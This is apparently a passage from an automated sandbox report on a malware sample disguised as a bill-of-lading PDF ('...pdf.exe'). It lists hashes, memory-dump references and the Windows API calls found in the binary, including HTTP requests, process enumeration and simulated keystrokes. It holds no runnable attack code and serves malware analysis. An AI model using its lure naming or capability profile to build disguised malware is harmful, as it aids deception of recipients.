                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                      • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                                                                      • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                      • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                                                                      APIs
                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00455F01
                                                                                                                      • _memset.LIBCMT ref: 00455F12
                                                                                                                      • SendMessageW.USER32 ref: 00455F43
                                                                                                                      • SendMessageW.USER32(?,0000104B,00000000,?), ref: 00455F82
                                                                                                                      • SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00455FF5
                                                                                                                      • _wcslen.LIBCMT ref: 00455FFC
                                                                                                                      • _wcslen.LIBCMT ref: 00456018
                                                                                                                      • CharNextW.USER32(00000000,?,?,?), ref: 00456034
                                                                                                                      • SendMessageW.USER32(?,0000104B,00000000,00000001), ref: 00456060
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$_wcslen$CharLongNextWindow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2321321212-0
                                                                                                                      • Opcode ID: 9fe44bf13dfe9639860e83451fa7f42e7831dc5b74bf465a4309150460e9ba2c
                                                                                                                      • Instruction ID: 728fd5b54b682decfcd50b06f9b7fb359c8698431e162ed45c662fcf507213b6
                                                                                                                      • Opcode Fuzzy Hash: 9fe44bf13dfe9639860e83451fa7f42e7831dc5b74bf465a4309150460e9ba2c
                                                                                                                      • Instruction Fuzzy Hash: 5D41D172204241ABE3108F68DC45BABB7E4FB84321F004A2EF954D72D1E7B9904A8B66
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                                                                        • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                                                                                                                        • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                                                                                                      • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2014098862-0
                                                                                                                      • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                      • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                                                                                      • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                      • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc_malloc$_strcat_strlen
                                                                                                                      • String ID: AU3_FreeVar
                                                                                                                      • API String ID: 2184576858-771828931
                                                                                                                      • Opcode ID: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                                                                                                      • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                                                                      • Opcode Fuzzy Hash: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                                                                                                      • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                                                                      APIs
                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                                                                      • DestroyWindow.USER32(?), ref: 0042A751
                                                                                                                      • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                      • String ID: close all
                                                                                                                      • API String ID: 4174999648-3243417748
                                                                                                                      • Opcode ID: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                                                                                                                      • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                                                                                                      • Opcode Fuzzy Hash: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                                                                                                                      • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                                                                                                      APIs
                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                                                                        • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1291720006-3916222277
                                                                                                                      • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                      • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                                                                      • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                      • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastselect
                                                                                                                      • String ID: HH
                                                                                                                      • API String ID: 215497628-2761332787
                                                                                                                      • Opcode ID: 0c289dde452dc5b8e8f80b5941646edeec8777aba5bf19acf69e203ec63bbfa9
                                                                                                                      • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                                                                      • Opcode Fuzzy Hash: 0c289dde452dc5b8e8f80b5941646edeec8777aba5bf19acf69e203ec63bbfa9
                                                                                                                      • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __snwprintf__wcsicoll_wcscpy
                                                                                                                      • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                                                                      • API String ID: 1729044348-3708979750
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,?,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,004A8E80,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,0040F3D2), ref: 0040FFCA
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                                                                                      • _wcscat.LIBCMT ref: 0044BCAA
                                                                                                                      • _wcslen.LIBCMT ref: 0044BCB7
                                                                                                                      • _wcslen.LIBCMT ref: 0044BCCB
                                                                                                                      • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                                                                      Similarity
                                                                                                                      • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 2326526234-1173974218
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                                                                                      • _wcslen.LIBCMT ref: 004366DD
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                                                                      • GetLastError.KERNEL32 ref: 0043670F
                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                                                                      • _wcsrchr.LIBCMT ref: 0043674C
                                                                                                                        • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                      • String ID: \
                                                                                                                      • API String ID: 321622961-2967466578
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                      • API String ID: 1038674560-2734436370
                                                                                                                      APIs
                                                                                                                      • EnumProcesses.PSAPI(?,00000800,?,?,00444263,?,?,?), ref: 00436EEC
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?), ref: 00436F44
                                                                                                                      • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00436F59
                                                                                                                      • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 00436F71
                                                                                                                      • __wsplitpath.LIBCMT ref: 00436FA0
                                                                                                                      • _wcscat.LIBCMT ref: 00436FB2
                                                                                                                      • __wcsicoll.LIBCMT ref: 00436FC4
                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,?,00000104,00000000,?,00000004,?), ref: 00437003
                                                                                                                      Similarity
                                                                                                                      • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2903788889-0
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(?), ref: 0044157D
                                                                                                                      • GetDC.USER32(00000000), ref: 00441585
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3864802216-0
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00401257
                                                                                                                        • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                                                                                        • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                                                                                        • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                                                                                        • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                      • KillTimer.USER32(?,?), ref: 004012B0
                                                                                                                      • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                                                                      • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                                                                      • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                                                                      • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1792922140-0
                                                                                                                      APIs
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                                                        • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                        • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                        • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                                                        • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                                                        • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                                                      • ExitThread.KERNEL32 ref: 0041410F
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                                                      • __freefls@4.LIBCMT ref: 00414135
                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1925773019-0
                                                                                                                      • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                                      • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                                                                                                                      • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                                                                      • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                                                                                                                      APIs
                                                                                                                      • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                                                                      • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                                                                      • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                                                                      • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                                                                      • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                                                                      • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                                                                      • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                                                                      • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                                                      • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                                                                                                                      • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                                                      • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                                                                                                                      APIs
                                                                                                                      • WSAStartup.WSOCK32(00000101,?,?), ref: 00464ADE
                                                                                                                        • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                      • inet_addr.WSOCK32(?,00000000,?,?,00000101,?,?), ref: 00464B1F
                                                                                                                      • gethostbyname.WSOCK32(?,?,00000000,?,?,00000101,?,?), ref: 00464B29
                                                                                                                      • _memset.LIBCMT ref: 00464B92
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00464CDE
                                                                                                                      • WSACleanup.WSOCK32 ref: 00464CE4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3424476444-0
                                                                                                                      • Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                      • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                                                                                                      • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                      • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                                                                                                      APIs
                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MetricsSystem
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4116985748-0
                                                                                                                      • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                      • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                                                                      • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                      • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
